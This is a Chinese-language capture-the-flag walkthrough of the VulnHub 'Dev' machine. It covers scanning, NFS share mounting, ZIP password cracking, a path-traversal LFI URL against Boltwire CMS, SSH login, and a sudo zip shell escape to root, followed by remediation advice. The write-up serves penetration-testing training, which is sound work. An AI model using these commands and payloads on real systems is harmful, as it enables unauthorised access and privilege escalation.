WNobsi/TCM-Dev-Machine-Walkthrough

# Dev - VulnHub 通关指南 # 目录 - 执行摘要 - 机器信息 - 攻击路径概述 - 信息收集 - 枚举 - 漏洞利用 - 权限提升 - 获取 Flag - 漏洞评估 - 修复与加固 - 关键收获 - 渗透测试员最终观察 # 执行摘要 **Dev** 机器演示了如何将多个低危和中危漏洞链接在一起，从而实现完整的系统攻陷。 攻击链包括： 1. 信息泄露 2. 目录枚举 3. NFS 配置不当 4. 本地文件包含 (LFI) 5. 凭证泄露 6. SSH 访问 7. Sudo 配置不当 8. Root 权限攻陷 # 机器信息 | 属性 | 值 | |-----------|--------| | 机器 | Dev | | 平台 | VulnHub | | 难度 | 简单-中等 | | 操作系统 | Linux | | 作者 | TCM Security | | 目标 | 获取 Root 权限 | # 攻击路径概述 ``` Recon └── Port Discovery └── Web Enumeration └── Directory Enumeration └── NFS Enumeration └── LFI └── Credential Discovery └── SSH Access └── Privilege Escalation └── Root ``` # 信息收集 ## 主机发现 ``` netdiscover ``` 或者 ``` nmap -sn 192.168.126.0/24 ``` 目标： ``` 192.168.126.133 ``` ## 端口扫描 ``` nmap -sC -sV -A -Pn 192.168.126.133 ``` ### 开放端口 | 端口 | 服务 | |------|----------| | 22 | SSH | | 80 | HTTP | | 2049 | NFS | | 8080 | HTTP | ## 渗透测试员观察 该机器暴露了多个服务，直接增加了攻击面。NFS 和两个 Web 服务的同时存在表明有多个潜在的入口点。 # 枚举 ## Web 枚举 ``` nikto -h http://192.168.126.133 ``` 应用程序泄露了： - 开发信息 - 技术栈信息 - 潜在的调试残留信息 ## 目录枚举 ### Feroxbuster ``` feroxbuster -u http://192.168.126.133 -x php ``` ### FFUF ``` ffuf -u http://192.168.126.133/FUZZ \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt ``` ### 有趣的目录 ``` /app /src /dev ``` ## 渗透测试员观察 像 `/app` 和 `/src` 这样的目录通常包含源代码、凭证或配置文件，应始终作为重点排查对象。 # 应用程序枚举 位于以下地址的应用程序： ``` http://192.168.126.133:8080/dev ``` 允许用户注册。 凭证： ``` Username: test Password: test ``` 发现了搜索功能。 ## 渗透测试员观察 搜索功能通常会导致以下漏洞： - SQL 注入 - 命令注入 - 本地文件包含 # NFS 枚举 ## 枚举共享 ``` showmount -e 192.168.126.133 ``` 发现的共享： ``` /srv/nfs ``` 挂载该共享： ``` mkdir /mnt/dev mount -t nfs 192.168.126.133:/srv/nfs /mnt/dev ``` 发现： ``` save.zip ``` ## 破解 ZIP ``` fcrackzip -D -p rockyou.txt save.zip ``` 发现的信息： - SSH 私钥 - 用户参考：`jp` - 密码候选：`I_love_java` ## 渗透测试员观察 NFS 共享通常会暴露备份文件和敏感信息，这些信息对后渗透活动有极大的帮助。 # 漏洞利用 ## Boltwire CMS 研究 漏洞参考： https://www.exploit-db.com/exploits/48411 ## 本地文件包含 ``` http://192.168.126.133:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd ``` 结果： ``` jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash ``` ## 凭证发现 配置文件： ``` /app/config/config.yml ``` 用于以下用途的凭证： ``` jeanpaul ``` 已被恢复。 ## 初始访问 ``` ssh jeanpaul@192.168.126.133 ``` 成功登录。 ## 渗透测试员观察 配置文件是枚举过程中最有价值的攻击目标之一，因为它们经常包含硬编码的凭证和应用程序密钥。 # 权限提升 ## 枚举 Sudo 权限 ``` sudo -l ``` 输出： ``` (ALL) NOPASSWD: /usr/bin/zip ``` ## 通过 GTFOBins 滥用 Zip ``` touch data.txt zip data.zip data.txt sudo zip data.zip data.txt -T --unzip-command='sh -c /bin/sh' ``` 验证： ``` whoami ``` 输出： ``` root ``` ## 渗透测试员观察 配置不当的 sudo 权限仍然是 Linux 系统上最常见且影响深远的权限提升途径之一。 # 获取 Flag ``` cd /root ls cat flag.txt ``` 成功捕获 Root flag。 # 漏洞评估 | 漏洞 | 严重程度 | |--------------|-----------| | 信息泄露 | 中危 | | 暴露的目录 | 中危 | | NFS 配置不当 | 高危 | | 本地文件包含 | 高危 | | 硬编码凭证 | 高危 | | Sudo 配置不当 | 严重 | # 修复与加固 ## 优先级 1 – 移除危险的 Sudo 权限 ``` visudo ``` 移除： ``` (ALL) NOPASSWD: /usr/bin/zip ``` ## 优先级 2 – 修补 Boltwire CMS - 升级应用程序 - 验证用户输入 - 限制文件访问 ## 优先级 3 – 移除硬编码凭证 - 使用环境变量 - 轮换凭证 - 实施密钥管理 ## 优先级 4 – 加固 NFS ``` /srv/nfs 192.168.126.0/24(ro,sync,no_subtree_check) ``` ## 优先级 5 – 减少信息泄露 - 禁用调试信息 - 移除开发文件 - 隐藏堆栈跟踪 # 关键收获 - 枚举是攻破靶机的关键。 - 低危发现同样重要。 - 永远不要忽视 NFS。 - 配置文件是金矿。 - 搜索功能通常隐藏着严重漏洞。 - 掌握 GTFOBins 知识非常宝贵。 # 渗透测试员最终观察 **Dev** 机器完美地演示了攻击者如何将看似无害的发现链接起来，最终实现完整的系统攻陷。 没有任何单一的漏洞能直接获取 root 访问权限。相反，成功取决于： 1. 详尽的枚举。 2. 信息收集。 3. 利用应用程序弱点。 4. 凭证获取。 5. 滥用权限配置不当。

标签：CSV导出, CTI, MISP, PE 加载器, Web报告查看器, 内存分配, 协议分析, 本地文件包含, 权限提升, 漏洞分析, 网络安全审计, 网页分析工具, 路径探测, 防御加固, 靶场实践